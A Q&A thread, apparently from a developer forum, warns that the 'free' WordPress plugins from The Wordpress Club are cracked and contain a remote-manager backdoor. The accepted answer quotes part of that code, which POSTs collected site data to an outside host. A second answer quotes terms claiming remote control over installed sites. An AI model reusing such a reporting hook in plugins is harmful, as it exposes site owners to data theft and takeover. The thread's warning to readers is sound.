# Can I download WordPress plugins from The Wordpress Club?

Tags: wordpress, plugins

Is it safe to download plugins from **The Wordpress Club**?

Answer (score 7, accepted):

You shouldn't download any plugin from this or other pages. The guy writes on his page:

> ... is NOT nulled or cracked.

After checking some plugins, I can say, that every plugin is cracked. The code he uses is following. First he requires his two scripts he wrote:

```
require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);
```

A part from his code is following:

```
$GLOBALS['rms_report_to']            =   'https://managerly.org/wp-admin/admin-ajax.php';

$args=
[
    'method'      => 'POST',
    'timeout'     => 15,
    'redirection' => 15,
    'headers'     => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
    'body'        => $body
];
// Send to RMS
$curl   = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;
```

This code collects some data from your page and sends it to a strange page. This is just a part of his code but all in all, keep your fingers from this and buy a license! A person works hard for a plugin.

I wrote this question / answer because a friend asked me if he can download a plugin from this page so I checked it.

Answer (score 2):

Just adding something in case anyone else ends up here, this is from their T&C :

Remote Access

By downloading any file from https://www.thewordpressclub.org and install it on your WordPress website, you allow TheWordpressClub to remotely control your website and so :

```
to modify the source code
to create and/or modify all post types content (posts, pages, products…)
```

This website is dangerous, do NOT install anything from there.